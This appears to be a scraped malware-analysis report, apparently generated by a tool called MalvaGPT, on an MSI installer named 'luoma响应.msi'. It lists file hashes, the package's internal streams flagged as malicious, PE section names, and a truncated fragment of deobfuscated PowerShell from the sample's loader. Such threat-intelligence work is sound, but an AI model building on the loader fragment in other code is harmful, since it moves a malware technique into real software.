Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
3c107fb4c98787e3daefd0264ee8eaa4
Sha1
d8dd1a09f7daf11dae61cb993a700c4557d1b584
Sha256
1b3577d4ef4e553995842f1feae47df6fce2a1e77893dbea2ce5a5135f248507
Sha384
21fed8f0cf2532b77a39ccdedc5a271e2f69e94228a8a8b72de669ba29e1b585ea7c7a53202eddd8514f324fd4f56b66
Sha512
081ba937246a07c242a1a164e730a1a2540145a896a98b8464432b892af0c849fd57e873a04420907cc218544ff9fc88116fbeb91630aab86c6f1cdbe4c4dc15
SSDeep
98304:Hq3MHrF7PHAM/GQEeFeiqUcRHiAozWzh6LUth+pAeUALpK/Yuwsf:Hq34F7Pp/9EThUyiAoqzg1j0Mi
TLSH
69163357F6F0A259C60727B582664308DC288D6B97495C24F1ECB328637CB63A1F87DE
File Structure
Root Entry
Malicious
䡀䌏䈯
䡀䈖䌧䠤
䡀䌋䄱䜵
䡀㬿䏲䐸䖱
䡀㽿䅤䈯䠶
䡀䈏䗤䕸䠨
䡀䕙䓲䕨䜷
䡀䌍䈵䗦䕲䠼
䡀䒌䓰䑲䑨䠷
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㿿䏤䇬䗤䒬䠱
䡀䖖㯬䏬㱨䖤䠫
䡀䘌䗶䐲䆊䌷䑲
䡀䇊䌰㾱㼒䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䑒䗶䏤㾯㼒䔨䈸䆱䠨
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
SummaryInformation
䈋㰛䝒䎘㯣䑩㶋㽠䄨䛕䋛䏬㵐㮨㭊䗧㰪䇧䖁䄾䇺
BeRGIzOkZFfnBMWTeaLxRhilGLeEADdtgGde4f
BeRGIzOkZFfnBMWTeaLxRhilGLeEADdtgGde4faaas
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.data
.rdata
.bss
.idata
.CRT
.tls
䌋䄱䜵䑾䋦㫶㻨㲐㸽䃮䉏㫱䀖䈝㵤㻻䌫㰯䈕㪎䇍䊷䇐
Malicious
䌋䄱䜵䑾䋦㫶㻨㲐㸽䃮䉏㫱䀖䈝㵤㻻䌫㰯䈕㪎䇍䊷䇐.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
BeRGIzOkZFfnBMWTeaLxRhilGLeEADdtgGde4f
BeRGIzOkZFfnBMWTeaLxRhilGLeEADdtgGde4faaas
rBeRGIzOkZFfnBMWTeaLxRhilGLeEADdtgGd
Artefacts
Name
Value
Deobfuscated PowerShell

"&{$b=[System.IO.File]::ReadAllBytes('"

luoma响应.msi (4.18 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙